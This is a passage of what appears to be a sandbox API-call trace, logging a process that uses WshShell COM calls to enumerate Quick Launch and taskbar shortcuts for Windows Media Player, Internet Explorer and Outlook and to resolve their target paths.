pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0, pExcepInfo=0x5a0dfb0, puArgErr=0x5a0dfac | out: pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe", varVal2=0x0), pExcepInfo=0x5a0dfb0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0dfac*=0x0) returned 0x0 [0167.024] SysStringLen (param_1="C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe") returned 0x38 [0167.024] WshShell:IUnknown:Release (This=0x285218) returned 0x2 [0167.024] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk")) returned 0x20 [0167.024] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini")) returned 0x6 [0167.024] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk")) returned 0x20 [0167.026] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x71 [0167.026] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk", nBufferLength=0x71, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk", lpFilePart=0x0) returned 0x70 [0167.026] CoGetContextToken (in: pToken=0x5a0dca4 | out: pToken=0x5a0dca4) returned 0x0 [0167.026] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dd10 | out: ppvObject=0x5a0dd10*=0x283d20) returned 0x0 [0167.027] WshShell:IDispatch:Invoke (in: This=0x283d20, dispIdMember=1002, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0e0c4*(rgvarg=([0]=0x5a0e0b4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk"), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0e0a4, pExcepInfo=0x5a0e084, puArgErr=0x5a0e080 | out: pDispParams=0x5a0e0c4*(rgvarg=([0]=0x5a0e0b4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0e0a4*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x285250, varVal2=0x0), pExcepInfo=0x5a0e084*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0e080*=0x0) returned 0x0 [0167.033] WshShell:IUnknown:QueryInterface (in: This=0x285250, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0db3c | out: ppvObject=0x5a0db3c*=0x285260) returned 0x0 [0167.034] WshShell:IUnknown:QueryInterface (in: This=0x285260, riid=0x71da1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5a0daf0 | out: ppvObject=0x5a0daf0*=0x0) returned 0x80004002 [0167.034] WshShell:IUnknown:QueryInterface (in: This=0x285260, riid=0x71da1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0d918 | out: ppvObject=0x5a0d918*=0x285270) returned 0x0 [0167.034] WshShell:IProvideClassInfo:GetClassInfo (in: This=0x285270, ppTI=0x5a0d920 | out: ppTI=0x5a0d920*=0x5c3dcf8) returned 0x0 [0167.034] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0d914, pDummy=0x40e4bc9c | out: ppTypeAttr=0x5a0d914, pDummy=0x40e4bc9c) returned 0x0 [0167.034] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x62ae0e8 [0167.034] WshShell:IUnknown:Release (This=0x285270) returned 0x2 [0167.034] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x7 [0167.037] WshShell:IUnknown:AddRef (This=0x285260) returned 0x3 [0167.037] WshShell:IUnknown:QueryInterface (in: This=0x285260, riid=0x71da182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x5a0d44c | out: ppvObject=0x5a0d44c*=0x0) returned 0x80004002 [0167.037] WshShell:IUnknown:QueryInterface (in: This=0x285260, riid=0x71da1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x5a0d3fc | out: ppvObject=0x5a0d3fc*=0x0) returned 0x80004002 [0167.037] WshShell:IUnknown:QueryInterface (in: This=0x285260, riid=0x71cd1388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d408 | out: ppvObject=0x5a0d408*=0x0) returned 0x80004002 [0167.037] CoGetContextToken (in: pToken=0x5a0d468 | out: pToken=0x5a0d468) returned 0x0 [0167.037] CoGetContextToken (in: pToken=0x5a0d410 | out: pToken=0x5a0d410) returned 0x0 [0167.038] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x1, cHandles=0x1, pHandles=0x5a0d3f8*=0x384, lpdwindex=0x5a0d2b0 | out: lpdwindex=0x5a0d2b0) returned 0x80010115 [0167.038] CoGetContextToken (in: pToken=0x5a0c8b4 | out: pToken=0x5a0c8b4) returned 0x0 [0167.038] CoGetContextToken (in: pToken=0x5a0c894 | out: pToken=0x5a0c894) returned 0x0 [0167.038] CoGetContextToken (in: pToken=0x5a0c818 | out: pToken=0x5a0c818) returned 0x0 [0167.038] WshShell:IUnknown:Release (This=0x5c3dbf0) returned 0x4 [0167.038] WshShell:IUnknown:Release (This=0x5c3dbf0) returned 0x3 [0167.038] CoGetContextToken (in: pToken=0x5a0c818 | out: pToken=0x5a0c818) returned 0x0 [0167.038] WshShell:IUnknown:Release (This=0x5c3dbc4) returned 0x2 [0167.038] WshShell:IUnknown:Release (This=0x5c3dbc4) returned 0x1 [0167.038] CoGetContextToken (in: pToken=0x5a0c818 | out: pToken=0x5a0c818) returned 0x0 [0167.038] WshShell:IUnknown:Release (This=0x283d60) returned 0x1 [0167.038] WshShell:IUnknown:Release (This=0x283d50) returned 0x0 [0167.038] CoGetContextToken (in: pToken=0x5a0c818 | out: pToken=0x5a0c818) returned 0x0 [0167.038] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x5 [0167.038] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x4 [0167.039] CoGetContextToken (in: pToken=0x5a0c818 | out: pToken=0x5a0c818) returned 0x0 [0167.039] WshShell:IUnknown:Release (This=0x5c3dccc) returned 0x3 [0167.039] WshShell:IUnknown:Release (This=0x5c3dccc) returned 0x2 [0167.039] CoGetContextToken (in: pToken=0x5a0c818 | out: pToken=0x5a0c818) returned 0x0 [0167.039] WshShell:IUnknown:Release (This=0x283d98) returned 0x1 [0167.039] WshShell:IUnknown:Release (This=0x283d88) returned 0x0 [0167.047] CoGetContextToken (in: pToken=0x5a0d87c | out: pToken=0x5a0d87c) returned 0x0 [0167.047] WshShell:IUnknown:QueryInterface (in: This=0x285260, riid=0x71da1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d8fc | out: ppvObject=0x5a0d8fc*=0x0) returned 0x80004002 [0167.047] WshShell:IUnknown:Release (This=0x285260) returned 0x2 [0167.047] WshShell:IUnknown:Release (This=0x283d20) returned 0x2 [0167.048] CoGetContextToken (in: pToken=0x5a0df04 | out: pToken=0x5a0df04) returned 0x0 [0167.048] CoGetContextToken (in: pToken=0x5a0de64 | out: pToken=0x5a0de64) returned 0x0 [0167.048] WshShell:IUnknown:QueryInterface (in: This=0x285260, riid=0x5a0df34*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0df30 | out: ppvObject=0x5a0df30*=0x285250) returned 0x0 [0167.048] WshShell:IUnknown:AddRef (This=0x285250) returned 0x3 [0167.048] WshShell:IUnknown:Release (This=0x285250) returned 0x2 [0167.048] WshShell:IDispatch:GetTypeInfoCount (in: This=0x285250, pctinfo=0x5a0df8c | out: pctinfo=0x5a0df8c) returned 0x0 [0167.048] WshShell:IDispatch:GetTypeInfo (in: This=0x285250, iTInfo=0x0, lcid=0x0, ppTInfo=0x5a0df88 | out: ppTInfo=0x5a0df88*=0x5c3dcf8) returned 0x0 [0167.049] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0da8c | out: ppvObject=0x5a0da8c*=0x5c3dcf8) returned 0x0 [0167.050] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x4 [0167.050] CoGetContextToken (in: pToken=0x5a0ddac | out: pToken=0x5a0ddac) returned 0x0 [0167.050] WshShell:IUnknown:AddRef (This=0x5c3dcf8) returned 0x5 [0167.050] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x4 [0167.050] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x3 [0167.050] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0df8c, pDummy=0x44f89ed2 | out: ppTypeAttr=0x5a0df8c, pDummy=0x44f89ed2) returned 0x0 [0167.050] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x62ae0e8 [0167.050] CoGetContextToken (in: pToken=0x5a0dccc | out: pToken=0x5a0dccc) returned 0x0 [0167.050] WshShell:IUnknown:QueryInterface (in: This=0x285260, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dd3c | out: ppvObject=0x5a0dd3c*=0x285250) returned 0x0 [0167.050] WshShell:IDispatch:Invoke (in: This=0x285250, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0e0e0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0e0d0, pExcepInfo=0x5a0e0b0, puArgErr=0x5a0e0ac | out: pDispParams=0x5a0e0e0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0e0d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", varVal2=0x0), pExcepInfo=0x5a0e0b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0e0ac*=0x0) returned 0x0 [0167.050] SysStringLen (param_1="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe") returned 0x35 [0167.050] WshShell:IUnknown:Release (This=0x285250) returned 0x2 [0167.051] CoGetContextToken (in: pToken=0x5a0dccc | out: pToken=0x5a0dccc) returned 0x0 [0167.051] WshShell:IUnknown:QueryInterface (in: This=0x285260, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dd3c | out: ppvObject=0x5a0dd3c*=0x285250) returned 0x0 [0167.051] WshShell:IDispatch:Invoke (in: This=0x285250, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0e0e0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0e0d0, pExcepInfo=0x5a0e0b0, puArgErr=0x5a0e0ac | out: pDispParams=0x5a0e0e0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0e0d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", varVal2=0x0), pExcepInfo=0x5a0e0b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0e0ac*=0x0) returned 0x0 [0167.051] SysStringLen (param_1="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe") returned 0x35 [0167.051] WshShell:IUnknown:Release (This=0x285250) returned 0x2 [0167.051] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk")) returned 0x20 [0167.051] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\microsoft outlook.lnk")) returned 0x20 [0167.053] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0167.053] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk", nBufferLength=0x62, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk", lpFilePart=0x0) returned 0x61 [0167.054] CoGetContextToken (in: pToken=0x5a0dca4 | out: pToken=0x5a0dca4) returned 0x0 [0167.054] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dd10 | out: ppvObject=0x5a0dd10*=0x283d20) returned 0x0 [0167.054] WshShell:IDispatch:Invoke (in: This=0x283d20, dispIdMember=1002, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0e0c4*(rgvarg=([0]=0x5a0e0b4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\microsoft outlook.lnk"), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0e0a4, pExcepInfo=0x5a0e084, puArgErr=0x5a0e080 | out: pDispParams=0x5a0e0c4*(rgvarg=([0]=0x5a0e0b4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0e0a4*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x283d50, varVal2=0x0), pExcepInfo=0x5a0e084*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0e080*=0x0) returned 0x0 [0167.065] WshShell:IUnknown:QueryInterface (in: This=0x283d50, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0db3c | out: ppvObject=0x5a0db3c*=0x283d60) returned 0x0 [0167.065] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x71da1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5a0daf0 | out: ppvObject=0x5a0daf0*=0x0) returned 0x80004002 [0167.065] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x71da1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0d918 | out: ppvObject=0x5a0d918*=0x283d70) returned 0x0 [0167.066] WshShell:IProvideClassInfo:GetClassInfo (in: This=0x283d70, ppTI=0x5a0d920 | out: ppTI=0x5a0d920*=0x5c3dcf8) returned 0x0 [0167.066] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0d914, pDummy=0x40e4bc9c | out: ppTypeAttr=0x5a0d914, pDummy=0x40e4bc9c) returned 0x0 [0167.066] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x5bcd228 [0167.066] WshShell:IUnknown:Release (This=0x283d70) returned 0x2 [0167.066] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x3 [0167.066] WshShell:IUnknown:AddRef (This=0x283d60) returned 0x3 [0167.066] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x71da182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x5a0d44c | out: ppvObject=0x5a0d44c*=0x0) returned 0x80004002 [0167.066] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x71da1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x5a0d3fc | out: ppvObject=0x5a0d3fc*=0x0) returned 0x80004002 [0167.066] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x71cd1388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d408 | out: ppvObject=0x5a0d408*=0x0) returned 0x80004002 [0167.066] CoGetContextToken (in: pToken=0x5a0d468 | out: pToken=0x5a0d468) returned 0x0 [0167.066] CoGetContextToken (in: pToken=0x5a0d87c | out: pToken=0x5a0d87c) returned 0x0 [0167.066] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x71da1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d8fc | out: ppvObject=0x5a0d8fc*=0x0) returned 0x80004002 [0167.067] WshShell:IUnknown:Release (This=0x283d60) returned 0x2 [0167.067] WshShell:IUnknown:Release (This=0x283d20) returned 0x2 [0167.067] CoGetContextToken (in: pToken=0x5a0df04 | out: pToken=0x5a0df04) returned 0x0 [0167.067] CoGetContextToken (in: pToken=0x5a0de64 | out: pToken=0x5a0de64) returned 0x0 [0167.067] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x5a0df34*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0df30 | out: ppvObject=0x5a0df30*=0x283d50) returned 0x0 [0167.067] WshShell:IUnknown:AddRef (This=0x283d50) returned 0x3 [0167.067] WshShell:IUnknown:Release (This=0x283d50) returned 0x2 [0167.067] WshShell:IDispatch:GetTypeInfoCount (in: This=0x283d50, pctinfo=0x5a0df8c | out: pctinfo=0x5a0df8c) returned 0x0 [0167.067] WshShell:IDispatch:GetTypeInfo (in: This=0x283d50, iTInfo=0x0, lcid=0x0, ppTInfo=0x5a0df88 | out: ppTInfo=0x5a0df88*=0x5c3dcf8) returned 0x0 [0167.067] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0da8c | out: ppvObject=0x5a0da8c*=0x5c3dcf8) returned 0x0 [0167.067] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x4 [0167.067] CoGetContextToken (in: pToken=0x5a0ddac | out: pToken=0x5a0ddac) returned 0x0 [0167.067] WshShell:IUnknown:AddRef (This=0x5c3dcf8) returned 0x5 [0167.067] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x4 [0167.067] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x3 [0167.068] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0df8c, pDummy=0x44f89ed2 | out: ppTypeAttr=0x5a0df8c, pDummy=0x44f89ed2) returned 0x0 [0167.068] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x5bcd228 [0167.068] CoGetContextToken (in: pToken=0x5a0dccc | out: pToken=0x5a0dccc) returned 0x0 [0167.068] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dd3c | out: ppvObject=0x5a0dd3c*=0x283d50) returned 0x0 [0167.068] WshShell:IDispatch:Invoke (in: This=0x283d50, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0e0e0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0e0d0, pExcepInfo=0x5a0e0b0, puArgErr=0x5a0e0ac | out: pDispParams=0x5a0e0e0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0e0d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", varVal2=0x0), pExcepInfo=0x5a0e0b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0e0ac*=0x0) returned 0x0 [0167.068] SysStringLen (param_1="C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE") returned 0x41 [0167.068] WshShell:IUnknown:Release (This=0x283d50) returned 0x2 [0167.068] CoGetContextToken (in: pToken=0x5a0dccc | out: pToken=0x5a0dccc) returned 0x0 [0167.068] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dd3c | out: ppvObject=0x5a0dd3c*=0x283d50) returned 0x0 [0167.068] WshShell:IDispatch:Invoke (in: This=0x283d50, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0e0e0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0e0d0, pExcepInfo=0x5a0e0b0, puArgErr=0x5a0e0ac | out: pDispParams=0x5a0e0e0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0e0d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", varVal2=0x0), pExcepInfo=0x5a0e0b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0e0ac*=0x0) returned 0x0 [0167.069] SysStringLen (param_1="C:\\Program 